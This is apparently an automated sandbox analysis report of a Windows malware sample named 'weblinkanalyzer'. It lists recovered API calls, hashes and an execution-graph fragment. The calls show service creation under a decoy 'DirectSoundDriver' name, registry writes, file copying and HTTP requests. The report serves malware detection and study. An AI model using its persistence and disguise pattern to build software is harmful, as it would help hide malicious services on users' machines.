• Instruction ID: 0e17b99c545429624e35815a83348e511bd8a70e8ccf8bf3b2f2de9a1ad67a53
• Opcode Fuzzy Hash: 2e1d1612e622339b26055c081b462bb1b5f10dc22293ef15fd6cbdadef8c59f8
• Instruction Fuzzy Hash: 65A0016599A214DAE22127D05A19A6A69286A1A78132580376382B10E249B9140FA6AF
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
control_flow_graph 147 40d451-40d458 OpenSCManagerA
APIs
Memory Dump Source
• Source File: 00000010.00000002.2011338102.000000000040B000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000010.00000002.2011338102.0000000000400000.00000040.00000001.01000000.00000011.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_weblinkanalyzer.jbxd
Similarity
• API ID: ManagerOpen
• String ID:
• API String ID: 1889721586-0
• Opcode ID: 9ed5e5ab46a34b1183b54c97295223e3599dc3336d81dfe18ed9d2878a1822e3
• Instruction ID: 1e8d8f9be64fba067e26ba2d448d73f2a2dd91e1f4fcd8f5598b6fd75d9e172d
• Opcode Fuzzy Hash: 9ed5e5ab46a34b1183b54c97295223e3599dc3336d81dfe18ed9d2878a1822e3
• Instruction Fuzzy Hash: F8A002A02045018AC6915F205FDC419255F6640316B611839D243E00E5CA789449A52E
Uniqueness
Uniqueness Score: -1.00%

APIs
• RegCreateKeyExA.KERNELBASE ref: 0040D62B
Memory Dump Source
• Source File: 00000010.00000002.2011338102.000000000040B000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000010.00000002.2011338102.0000000000400000.00000040.00000001.01000000.00000011.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_weblinkanalyzer.jbxd
Similarity
• API ID: Create
• String ID:
• API String ID: 2289755597-0
• Opcode ID: 969777215f77948ced44a4e344d970cab082f1d3304c2fcecb1ab55786fc3155
• Instruction ID: c74dabf9949369d5c62da8fd438f69c3850cb3cf4aa8c6dce4d298867a589fab
• Opcode Fuzzy Hash: 969777215f77948ced44a4e344d970cab082f1d3304c2fcecb1ab55786fc3155
• Instruction Fuzzy Hash: 0C9002203045019AD2501A315B0C2152598550464971104395647E1090DA748109991E
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
control_flow_graph 149 40d578-40d57e RegCloseKey
APIs
Memory Dump Source
• Source File: 00000010.00000002.2011338102.000000000040B000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000010.00000002.2011338102.0000000000400000.00000040.00000001.01000000.00000011.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_weblinkanalyzer.jbxd
Similarity
• API ID: Close
• String ID:
• API String ID: 3535843008-0
• Opcode ID: 3e6d8f56397a6fd8f4d34382528745662e6caf6af1d865ec9120a216119d48a8
• Instruction ID: 046338ef49b4dad716f2584d43b15ea982064a3712732217e229f8b42be1af81
• Opcode Fuzzy Hash: 3e6d8f56397a6fd8f4d34382528745662e6caf6af1d865ec9120a216119d48a8
• Instruction Fuzzy Hash: FC900271955901A7C24007505F2D9153550611870132184376B46710E189F95407570E
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
control_flow_graph 148 402994-40299a CopyFileA
APIs
Memory Dump Source
• Source File: 00000010.00000002.2011338102.0000000000400000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000010.00000002.2011338102.000000000040B000.00000040.00000001.01000000.00000011.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_weblinkanalyzer.jbxd
Similarity
• API ID: CopyFile
• String ID:
• API String ID: 1304948518-0
• Opcode ID: 61d6449afb094023633c684944401277847045becdee46003d3530854dca8aa9
• Instruction ID: 8a9b989459de8ba4b383989f71eab82c3655f6d4a6f9597199558f747d970bc5
• Opcode Fuzzy Hash: 61d6449afb094023633c684944401277847045becdee46003d3530854dca8aa9
• Instruction Fuzzy Hash: 1A9002302041019AD2040A315B9C715276855046C131544796847E0090DA7880496529
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000010.00000002.2011338102.000000000040B000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000010.00000002.2011338102.0000000000400000.00000040.00000001.01000000.00000011.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_weblinkanalyzer.jbxd
Similarity
• API ID: lstrcmpi
• String ID:
• API String ID: 1586166983-0
• Opcode ID: 1133d926d828d468f2c0823ec2603520c2d080e7cd513d012715edb874195993
• Instruction ID: 1999ed2a319cb111f58d93e36599d65504c6bfb494e199db35daf75dc5fcdc4b
• Opcode Fuzzy Hash: 1133d926d828d468f2c0823ec2603520c2d080e7cd513d012715edb874195993
• Instruction Fuzzy Hash: 1F900260304201EFE2000B325F0C31525A46704641712443D5447E0194DA7C8005956A
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000010.00000002.2011338102.0000000000400000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000010.00000002.2011338102.000000000040B000.00000040.00000001.01000000.00000011.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_weblinkanalyzer.jbxd
Similarity
• API ID: CreateService
• String ID:
• API String ID: 1592570254-0
• Opcode ID: 2e8116c818adf02881423c3d5d941bf26f5b1a2f7a4fd0b9110157fe06f65c55
• Instruction ID: 0602c40c1dbccdcc73e530ffc71a58eccebc0d0648145afbdcc57a56ac06b62b
• Opcode Fuzzy Hash: 2e8116c818adf02881423c3d5d941bf26f5b1a2f7a4fd0b9110157fe06f65c55
• Instruction Fuzzy Hash: 1BA02220808002CEC2002FE00E88028A0080082308330883EC30BF00C0CA38C88FB03F
Uniqueness

Uniqueness Score: -1.00%

APIs
• RegisterServiceCtrlHandlerA.ADVAPI32(DirectSoundDriver 2.36.198.67,0040235E), ref: 004023C1
• SetServiceStatus.ADVAPI32(0040C418), ref: 00402420
• GetLastError.KERNEL32 ref: 00402422
• CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0040242F
• GetLastError.KERNEL32 ref: 00402450
• SetServiceStatus.ADVAPI32(0040C418), ref: 00402480
• CreateThread.KERNEL32(00000000,00000000,Function_000022CB,00000000,00000000,00000000), ref: 0040248C
• WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00402495
• CloseHandle.KERNEL32 ref: 004024A1
• SetServiceStatus.ADVAPI32(0040C418), ref: 004024CA
Strings
• DirectSoundDriver 2.36.198.67, xrefs: 004023BC
Memory Dump Source
• Source File: 00000010.00000002.2011338102.0000000000400000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000010.00000002.2011338102.000000000040B000.00000040.00000001.01000000.00000011.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_weblinkanalyzer.jbxd
Similarity
• API ID: Service$Status$CreateErrorLast$CloseCtrlEventHandleHandlerObjectRegisterSingleThreadWait
• String ID: DirectSoundDriver 2.36.198.67
• API String ID: 3346042915-3753546761
• Opcode ID: 5fcb9a5b87dc8469fff6859aaf6bea1fa8643ec6b521037b188f0322a84c0a7e
• Instruction ID: 1a01264c41601166a4e66a8b54459f3afdfc7a3d4d59415bdd3a2783c39f4923
• Opcode Fuzzy Hash: 5fcb9a5b87dc8469fff6859aaf6bea1fa8643ec6b521037b188f0322a84c0a7e
• Instruction Fuzzy Hash: F821D670401210EBD2105F26EFE996A7EACFBC9754751823EE544B22B1C7B90409DF6C
Uniqueness

Uniqueness Score: -1.00%

APIs
• LCMapStringW.KERNEL32(00000000,00000100,00408658,00000001,00000000,00000000,00000103,00000001,00000000,?,00405537,00200020,00000000,?,00000000,00000000), ref: 00406B05
• LCMapStringA.KERNEL32(00000000,00000100,00408654,00000001,00000000,00000000,?,00405537,00200020,00000000,?,00000000,00000000,00000001), ref: 00406B21
• LCMapStringA.KERNEL32(?,?,?,?,7U@ ,?,00000103,00000001,00000000,?,00405537,00200020,00000000,?,00000000,00000000), ref: 00406B6A
• MultiByteToWideChar.KERNEL32(00000000,00000002,00000000,00200020,00000000,00000000,00000103,00000001,00000000,?,00405537,00200020,00000000,?,00000000,00000000), ref: 00406BA2
• MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00200020,?,00000000,?,00405537,00200020,00000000,?,00000000), ref: 00406BFA
• LCMapStringW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,?,00405537,00200020,00000000,?,00000000), ref: 00406C10
• LCMapStringW.KERNEL32(?,?,?,00000000,7U@ ,?,?,00405537,00200020,00000000,?,00000000), ref: 00406C43
• LCMapStringW.KERNEL32(00000000,?,?,?,?,00000000,?,00405537,00200020,00000000,?,00000000), ref: 00406CAB
Strings
Memory Dump Source
• Source File: 00000010.00000002.2011338102.0000000000400000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000010.00000002.2011338102.000000000040B000.00000040.00000001.01000000.00000011.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_weblinkanalyzer.jbxd
Similarity
• API ID: String$ByteCharMultiWide
• String ID: 7U@
• API String ID: 352835431-3990396050
• Opcode ID: 7311542cf2bc8e314ac09162f2172350a795be2e08e0f18793ed5822aaba0d35
• Instruction ID: 02e506ee65740420ae3233abb4e535ac9c0d9cfafd58d7118099ca6790f9c1e8
• Opcode Fuzzy Hash: 7311542cf2bc8e314ac09162f2172350a795be2e08e0f18793ed5822aaba0d35
• Instruction Fuzzy Hash: FE51AE71500209EFDF219F54CE49EAF7FB5FB48750F11412AF952B22A0D73A8861EB68
Uniqueness

Uniqueness Score: -1.00%

APIs
• LoadLibraryA.KERNEL32(user32.dll,?,00000000,?,004053C1,?,Microsoft Visual C++ Runtime Library,00012010,?,0040858C,?,004085DC,?,?,?,Runtime Error!Program: ), ref: 00406735
• GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 0040674D
• GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 0040675E
• GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 0040676B
Strings
Memory Dump Source
• Source File: 00000010.00000002.2011338102.0000000000400000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000010.00000002.2011338102.000000000040B000.00000040.00000001.01000000.00000011.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_weblinkanalyzer.jbxd
Similarity
• API ID: AddressProc$LibraryLoad
• String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
• API String ID: 2238633743-4044615076
• Opcode ID: d3419985ad88c67346e684d4d63523e685432ef50571a5d9d37b6701a5455ac8
• Instruction ID: 7fc34865fb6cd96f75d35faf7655371ce0829d27f510573cbc416552b2b19a82
• Opcode Fuzzy Hash: d3419985ad88c67346e684d4d63523e685432ef50571a5d9d37b6701a5455ac8
• Instruction Fuzzy Hash: 5F018871200301EFCB209FB59EC096F3AE89B98745316183FB145F3291DE7A88118B6D
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetStringTypeW.KERNEL32(00000001,00408658,00000001,00000000,00000103,00000001,00000000,00405537,00200020,00000000,?,00000000,00000000,00000001), ref: 004069B9
                                                                                                                                                                                                                                  • GetStringTypeA.KERNEL32(00000000,00000001,00408654,00000001,?,?,00000000,00000000,00000001), ref: 004069D3
                                                                                                                                                                                                                                  • GetStringTypeA.KERNEL32(00000000,00000000,?,00000000,00200020,00000103,00000001,00000000,00405537,00200020,00000000,?,00000000,00000000,00000001), ref: 00406A07
                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(7U@ ,00000002,?,00000000,00000000,00000000,00000103,00000001,00000000,00405537,00200020,00000000,?,00000000,00000000,00000001), ref: 00406A3F
                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000001), ref: 00406A95
                                                                                                                                                                                                                                  • GetStringTypeW.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000001), ref: 00406AA7
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000010.00000002.2011338102.0000000000400000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2011338102.000000000040B000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_weblinkanalyzer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: StringType$ByteCharMultiWide
                                                                                                                                                                                                                                  • String ID: 7U@
                                                                                                                                                                                                                                  • API String ID: 3852931651-3990396050
                                                                                                                                                                                                                                  • Opcode ID: acbd839e8d8ecd8a78113468315f90f2f487c60c4e6f1d93c346ab407284bb9c
                                                                                                                                                                                                                                  • Instruction ID: 163a86b768802ebad6552dab4735af5f1520240db88ca7a198a85c033bcdd74c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: acbd839e8d8ecd8a78113468315f90f2f487c60c4e6f1d93c346ab407284bb9c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 28418D71600209AFCF209F94CD86EAF3B69FB05750F11453AFA12B2290C7398D649B99
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000), ref: 0040530A
                                                                                                                                                                                                                                  • GetStdHandle.KERNEL32(000000F4,0040858C,00000000,?,00000000,00000000), ref: 004053E0
                                                                                                                                                                                                                                  • WriteFile.KERNEL32(00000000), ref: 004053E7
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000010.00000002.2011338102.0000000000400000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2011338102.000000000040B000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_weblinkanalyzer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: File$HandleModuleNameWrite
                                                                                                                                                                                                                                  • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                                                                                                                                                                                  • API String ID: 3784150691-4022980321
                                                                                                                                                                                                                                  • Opcode ID: 04978173c4f2aad6ddf0a9b2dd67cf14b182e4245fdcd9156cda6d464bb7ec48
                                                                                                                                                                                                                                  • Instruction ID: 92436d38ab3050e8b35fbc92b936da31f470892ba1b2a307495bbf6c2249caee
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 04978173c4f2aad6ddf0a9b2dd67cf14b182e4245fdcd9156cda6d464bb7ec48
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 54318372600618AEDB20A660CE4AF9B776CEB45344F5004BFF945B61C1EAB8AA448F5D
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00403196), ref: 00404DCF
                                                                                                                                                                                                                                  • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00403196), ref: 00404DE3
                                                                                                                                                                                                                                  • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00403196), ref: 00404E0F
                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00403196), ref: 00404E47
                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00403196), ref: 00404E69
                                                                                                                                                                                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000,?,00000000,?,?,?,?,00403196), ref: 00404E82
                                                                                                                                                                                                                                  • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00403196), ref: 00404E95
                                                                                                                                                                                                                                  • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00404ED3
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000010.00000002.2011338102.0000000000400000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2011338102.000000000040B000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_weblinkanalyzer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: EnvironmentStrings$ByteCharFreeMultiWide
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1823725401-0
                                                                                                                                                                                                                                  • Opcode ID: 5df378f2b83ba4a7a4bd83ea2c47c7d8eb90fe3c70b4f87b1639606013dd4eda
                                                                                                                                                                                                                                  • Instruction ID: 56fc3daba095db5e8e6f62c072fe8221d0ae9ee3e10054882f672288d86757d0
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5df378f2b83ba4a7a4bd83ea2c47c7d8eb90fe3c70b4f87b1639606013dd4eda
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8E31CDF25042555EDB206BA4DD8483BB69CFB85358716093BF782E3280EA798C5186E9
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • FindResourceA.KERNEL32(?,0000000A), ref: 00401F7A
                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00401F86
                                                                                                                                                                                                                                  • SizeofResource.KERNEL32(00000000), ref: 00401F93
                                                                                                                                                                                                                                  • LoadResource.KERNEL32(00000000), ref: 00401FAD
                                                                                                                                                                                                                                  • LockResource.KERNEL32(00000000), ref: 00401FB4
                                                                                                                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,00000000), ref: 00401FBF
                                                                                                                                                                                                                                  • GetTickCount.KERNEL32 ref: 00401FFB
                                                                                                                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 00402061
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000010.00000002.2011338102.0000000000400000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2011338102.000000000040B000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_weblinkanalyzer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Resource$AllocGlobal$CountErrorFindLastLoadLockSizeofTick
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 564119183-0
                                                                                                                                                                                                                                  • Opcode ID: dedb19f2a2c7d510851ce449977d34ca5ee50571f982d78a6468dda1d4bf86fe
                                                                                                                                                                                                                                  • Instruction ID: a90e581a73a4811956ae2efad35f221ca7a2e3ffda059466d66554c94119bb76
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dedb19f2a2c7d510851ce449977d34ca5ee50571f982d78a6468dda1d4bf86fe
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 21316E31A00355AFDB115FB49F889AF7B78EB45344B10807AFE86F72C1DA748845C7A8
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetVersionExA.KERNEL32 ref: 00403321
                                                                                                                                                                                                                                  • GetEnvironmentVariableA.KERNEL32(__MSVCRT_HEAP_SELECT,?,00001090), ref: 00403356
                                                                                                                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 004033B6
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000010.00000002.2011338102.0000000000400000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2011338102.000000000040B000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_weblinkanalyzer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: EnvironmentFileModuleNameVariableVersion
                                                                                                                                                                                                                                  • String ID: __GLOBAL_HEAP_SELECTED$__MSVCRT_HEAP_SELECT
                                                                                                                                                                                                                                  • API String ID: 1385375860-4131005785
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetStartupInfoA.KERNEL32(?), ref: 00404F3F
• GetFileType.KERNEL32(00000800), ref: 00404FE5
• GetStdHandle.KERNEL32(-000000F6), ref: 0040503E
• GetFileType.KERNEL32(00000000), ref: 0040504C
• SetHandleCount.KERNEL32 ref: 00405083
Memory Dump Source
• Source File: 00000010.00000002.2011338102.0000000000400000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000010.00000002.2011338102.000000000040B000.00000040.00000001.01000000.00000011.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_weblinkanalyzer.jbxd
Similarity
• API ID: FileHandleType$CountInfoStartup
• String ID:
• API String ID: 1710529072-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00200020,?,00000000,?,00405537,00200020,00000000,?,00000000), ref: 00406BFA
• LCMapStringW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,?,00405537,00200020,00000000,?,00000000), ref: 00406C10
• LCMapStringW.KERNEL32(?,?,?,00000000,7U@ ,?,?,00405537,00200020,00000000,?,00000000), ref: 00406C43
• LCMapStringW.KERNEL32(00000000,?,?,?,?,00000000,?,00405537,00200020,00000000,?,00000000), ref: 00406CAB
• WideCharToMultiByte.KERNEL32(?,00000220,?,00000000,7U@ ,?,00000000,00000000,?,00000000,?,00405537,00200020,00000000,?,00000000), ref: 00406CD0
Strings
Memory Dump Source
• Source File: 00000010.00000002.2011338102.0000000000400000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000010.00000002.2011338102.000000000040B000.00000040.00000001.01000000.00000011.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_weblinkanalyzer.jbxd
Similarity
• API ID: String$ByteCharMultiWide
• String ID: 7U@
• API String ID: 352835431-3990396050
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetModuleHandleA.KERNEL32(KERNEL32,004030CC), ref: 00404371
• GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00404381
Strings
Memory Dump Source
• Source File: 00000010.00000002.2011338102.0000000000400000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000010.00000002.2011338102.000000000040B000.00000040.00000001.01000000.00000011.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_weblinkanalyzer.jbxd
Similarity
• API ID: AddressHandleModuleProc
• String ID: IsProcessorFeaturePresent$KERNEL32
• API String ID: 1646373207-3105848591
Uniqueness
Uniqueness Score: -1.00%

APIs
• HeapAlloc.KERNEL32(00000000,00002020,?,00000000,?,?,00403490), ref: 00403D19
• VirtualAlloc.KERNEL32(00000000,00400000,00002000,00000004,?,00000000,?,?,00403490), ref: 00403D3D
• VirtualAlloc.KERNEL32(00000000,00010000,00001000,00000004,?,00000000,?,?,00403490), ref: 00403D57
• VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,?,?,00403490), ref: 00403E18
• HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,00403490), ref: 00403E2F
Memory Dump Source
• Source File: 00000010.00000002.2011338102.0000000000400000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000010.00000002.2011338102.000000000040B000.00000040.00000001.01000000.00000011.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_weblinkanalyzer.jbxd
Similarity
• API ID: AllocVirtual$FreeHeap
• String ID:
• API String ID: 714016831-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetCPInfo.KERNEL32(?,00000000), ref: 00406596
Strings
Memory Dump Source
• Source File: 00000010.00000002.2011338102.0000000000400000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000010.00000002.2011338102.000000000040B000.00000040.00000001.01000000.00000011.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_weblinkanalyzer.jbxd
Similarity
• API ID: Info
• String ID: $
• API String ID: 1807457897-3032137957
Uniqueness
Uniqueness Score: -1.00%

APIs
• HeapReAlloc.KERNEL32(00000000,00000050,?,00000000,00403914,?,?,?,00000100,?,00000000), ref: 00403B74
• HeapAlloc.KERNEL32(00000008,000041C4,?,00000000,00403914,?,?,?,00000100,?,00000000), ref: 00403BA8
• VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004,?,00000000,00403914,?,?,?,00000100,?,00000000), ref: 00403BC2
• HeapFree.KERNEL32(00000000,?,?,00000000,00403914,?,?,?,00000100,?,00000000), ref: 00403BD9
Memory Dump Source
• Source File: 00000010.00000002.2011338102.0000000000400000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000010.00000002.2011338102.000000000040B000.00000040.00000001.01000000.00000011.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_weblinkanalyzer.jbxd
Similarity
• API ID: AllocHeap$FreeVirtual
• String ID:
• API String ID: 3499195154-0
                                                                                                                                                                                                                                  • Opcode ID: 3d2489dfb7edba8101981c13f95fc6febc3da7b0dfed5f0ee755b7708c58c99a
                                                                                                                                                                                                                                  • Instruction ID: fcdd260894a6eddc8adf86aaa2b40ca1807c17f8388b21482d04f48ace73d9e8
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3d2489dfb7edba8101981c13f95fc6febc3da7b0dfed5f0ee755b7708c58c99a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1B111630300206DFD720CF28EE85A227BB6FB897557104B39E592E69A1D771A945CF18
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                  Execution Coverage:3.7%
                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                  Signature Coverage:1.3%
                                                                                                                                                                                                                                  Total number of Nodes:2000
                                                                                                                                                                                                                                  Total number of Limit Nodes:41
80040->80042 80044 416fb0 4 API calls 80041->80044 80042->80038 80056 404c17 80043->80056 80045 404669 80044->80045 80046 416ea0 lstrcpy 80045->80046 80047 404672 80046->80047 80048 416fb0 4 API calls 80047->80048 80049 404691 80048->80049 80050 416ea0 lstrcpy 80049->80050 80051 40469a 80050->80051 80052 416f20 3 API calls 80051->80052 80053 4046b8 80052->80053 80054 416ea0 lstrcpy 80053->80054 80055 4046c1 80054->80055 80057 416fb0 4 API calls 80055->80057 80056->79206 80058 4046e0 80057->80058 80059 416ea0 lstrcpy 80058->80059 80060 4046e9 80059->80060 80061 416fb0 4 API calls 80060->80061 80062 404708 80061->80062 80063 416ea0 lstrcpy 80062->80063 80064 404711 80063->80064 80065 416fb0 4 API calls 80064->80065 80066 40473d 80065->80066 80067 416f20 3 API calls 80066->80067 80068 404744 80067->80068 80069 416ea0 lstrcpy 80068->80069 80070 40474d 80069->80070 80071 404763 InternetConnectA 80070->80071 80071->80027 80072 404793 HttpOpenRequestA 80071->80072 80074 4047e8 80072->80074 80075 404b7e InternetCloseHandle 80072->80075 80076 416fb0 4 API calls 80074->80076 80075->80027 80077 4047fc 80076->80077 80078 416ea0 lstrcpy 80077->80078 80079 404805 80078->80079 80080 416f20 3 API calls 80079->80080 80081 404823 80080->80081 80082 416ea0 lstrcpy 80081->80082 80083 40482c 80082->80083 80084 416fb0 4 API calls 80083->80084 80085 40484b 80084->80085 80086 416ea0 lstrcpy 80085->80086 80087 404854 80086->80087 80088 416fb0 4 API calls 80087->80088 80089 404875 80088->80089 80090 416ea0 lstrcpy 80089->80090 80091 40487e 80090->80091 80092 416fb0 4 API calls 80091->80092 80093 40489e 80092->80093 80094 416ea0 lstrcpy 80093->80094 80095 4048a7 80094->80095 80096 416fb0 4 API calls 80095->80096 80097 4048c6 80096->80097 80098 416ea0 lstrcpy 80097->80098 80099 4048cf 80098->80099 80100 416f20 3 API calls 80099->80100 80101 4048ed 80100->80101 80102 416ea0 lstrcpy 80101->80102 80103 4048f6 80102->80103 80104 416fb0 4 API calls 80103->80104 80105 404915 80104->80105 80106 